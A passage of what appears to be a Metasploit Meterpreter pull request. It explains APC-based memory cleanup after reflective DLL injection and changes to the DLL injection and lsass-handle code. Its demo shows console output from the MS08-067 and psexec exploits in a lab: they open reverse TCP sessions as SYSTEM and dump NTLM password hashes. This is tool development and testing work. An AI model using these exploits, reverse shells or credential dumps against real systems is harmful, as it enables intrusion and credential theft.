3. `NtQueueApcThread` is used to add a call to [`WaitForSingleObjectEx`](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobjectex). `NtQueueApcThread` is used instead of `QueueUserAPC` because it allows the target function to be called with three arguments instead of one. The WaitForSingleObjectEx call is used to ensure the cleanup thread waits on the current thread before executing the next APC. The current thread can take its time before exiting.
4. [`QueueUserAPC`](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc) is used to have the cleanup thread close the handle to the current thread, ensuring there is no handle leak.
5. `NtQueueApcThread` is used again to queue a call to VirtualFree to free the memory previously allocated by the ReflectiveLoader. This step is the whole point of the process.
6. The cleanup thread is resumed, causing it to execute it's APCs before invoking it's start routine.
7. The current thread closes the handle to the cleanup thread and exits itself, causing the `WaitForSingleObjectEx` call in step 3 to return and the remaining queued function to run in order.

You can validate that everything works correctly by seeing that the process does not crash and that the memory is freed and handles are closed. Process Hacker is a good tool for this and you can log the freed values in the debug output. This has been validated on Windows XP and Server 2019.

### Additional changes
* Updated `inject_dll` signature. It had a few unnecessary limitations including:
    * The argument was a null-terminated string instead of an arbitrarily sized buffer (fixed by adding a size argument)
    * The argument that was provided had to be a local buffer and not a remote pointer (fixed by checking the new size argument)
    * The target process architecture must match the current Meterpreter architecture (fixed by adding a destination architecture argument like the other inject methods have)
* Event lock names are now randomized
* Switched `get_lsass_handle` from using `GetModuleBaseName` to use `GetProcessImageFileName` so it would work in WOW64 environments

## Testing

- [ ] Test all of the MSVC builds to ensure they're compiling correct
- [ ] Test all of the docker builds to ensure they are also compiling correct (run `make docker` from `c/meterpreter`)
- [ ] Test that hashdump works on
- [ ] 32-bit systems with a 32-bit Meterpreter
- [ ] 64-bit systems with a 64-bit Meterpreter
- [ ] 64-bit systems with a 32-bit Meterpreter

If you test the MinGW builds, note that the session will crash on initialization unless `AutoLoadStdapi` is disabled or the changes #630 are present.

## Demo
Shows everything working as expected in the following scenarios:

* x86 working on Windows XP (showing we still support the oldest version)
* WOW64 working on Server 2019 (this is the new one)
* x64 working on Server 2019 (showing this still works
```
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.16:445 - Automatically detecting the target...
[*] 192.168.159.16:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.16:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.16:445 - Attempting to trigger the vulnerability...
[*] Sending stage (242254 bytes) to 192.168.159.16
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.16:1036) at 2023-04-06 17:40:53 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SMCINTYR-7D7507
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cde0d26ae931b73b59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d998557dad6cc5ee0611a3ea94445b99:1008c1045548a33f06d2848c53e73d3e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:73fc8537a3d4ac0b57ec75736d809988:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.16 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/psexec 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (186950 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.96:56672) at 2023-04-06 17:40:10 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[*] 192.168.159.96:445 - Selecting PowerShell target
[*] 192.168.159.96:445 - Executing the payload...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (222278 bytes) to 192.168.159.96
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.96:56676) at 2023-04-06 17:40:31 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KHPRSGSRF30
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae932b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1681c4fd1448319a8c04f:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:492392ba299df55a3d78fb3004a81b96:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4085fbdccb5f3c0b34f112bb7a57fe3d:::
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.96 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > 
```